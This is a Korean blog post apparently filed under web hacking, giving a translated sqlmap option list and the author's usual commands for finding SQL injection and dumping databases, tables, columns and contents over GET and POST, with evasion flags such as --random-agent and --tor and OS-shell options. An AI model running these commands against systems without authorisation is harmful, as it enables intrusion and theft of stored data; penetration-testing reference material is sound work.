pjh
SQL map 명령어 본문
기본적인 sqlmap 명령어와 제가 자주 사용하는 명령어를 올려놨습니다.
sqlmap -h
-----------------------------------------------------------------------------------------------------------
Options:
-h, --help 기본 도움말
-hh 고급 도움말
--version 프로그램 버전 정보
-v VERBOSE 상세 레벨: 0-6 (디폴트 1)
Target:
-u URL, --url=URL URL 지정(e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
--data=DATA POST방식으로 전송 시 파라미터 값 (e.g. "id=1")
--cookie=COOKIE HTTP Cookie header 값(e.g. "PHPSESSID=a8d127e..")
--random-agent 랜덤하게 user-agent header 변경
--proxy=PROXY 프록시 사용하여 대상 URL 연결
--tor Tor 익명 네트워크 사용
--check-tor Tor 적절성 체크
Injection:
-p TESTPARAMETER 특정 파라미터 지정
--dbms=DBMS dbms 설정
Detection:
--level=LEVEL 테스트 레벨 (1-5, 디폴트 1)
--risk=RISK 테스트 위험 (0-3, 디폴트 1)
Techniques:
--technique=TECH SQL 인젝션 기법 사용 (디폴트 BEUSTQ)
Enumeration:
-a, --all 모든 검색
-b, --banner 배너 검색
--current-user 최근 사용자 검색
--current-db 최근 데이터베이스 검색
--passwords 유저 패스워드 해쉬값 열거
--tables 데이터베이스 테이블 열거
--columns 데이터베이스 테이블 컬럼 열거
--schema 스키마 열거
--dump 데이터베이스 테이블 항목 덤프
--dump-all 모든 데이터베이스 테이블 항목 덤프
-D DB 특정 데이터베이스 지정
-T TBL 특정 테이블 지정
-C COL 특정 컬럼 지정
Operating system access:
--os-shell 대화형 운영체제 쉘 프롬프트
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
--batch 사용자가 입력을 요청하지 않으면 기본 동작을 사용함
--flush-session Flush session files for current target
Miscellaneous:
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard 초급 사용자를 위한 간단한 인터페이스
-----------------------------------------------------------------------------------------------------------
sqlmap GET 방식
DB정보 추출
py sqlmap -u "URL" -p "특정 파라미터" --random-agent --level=5 --risk=3 -v 3 --dbs
(타겟URL의 특정 파라미터 값에 SQL 인젝션 발생이 예상, 테스트레벨5 위험레벨3 상세정보3 수준으로 DB정보 추출시도)
지정된 DB에서 Table 정보 추출
py sqlmap -u "URL" -p "특정 파라미터" --random-agent --level=5 --risk=3 -v 3 -D DB명 --table
(지정된 DB에 table 정보 추출)
지정된 DB에 지정된 Table에 columns 정보 추출
py sqlmap -u "URL" -p "특정 파라미터" --random-agent --level=5 --risk=3 -v 3 -D DB명 -T table명 --columns
(지정된 DB에 지정된 Table에 컬럼 정보 추출)
지정된 DB에 지정된 Table에 특정 columns 덤프
py sqlmap -u "URL" -p "특정 파라미터" --random-agent --level=5 --risk=3 -v 3 -D DB명 -T table명 -C 컬럼명 --dump
(지정된 DB에 지정된 Table에 특정 컬럼내용 덤프)
sqlmap POST 방식
py sqlmap -u "URL" --data "모든 파라미터" -p "특정 파라미터" --random-agent --level=5 --risk=3 -v 3 --dbs
(이하 GET방식과 동일)
'H A C K I N G > Web' 카테고리의 다른 글
SSL 분석 사이트 (0) | 2019.12.06 |
---|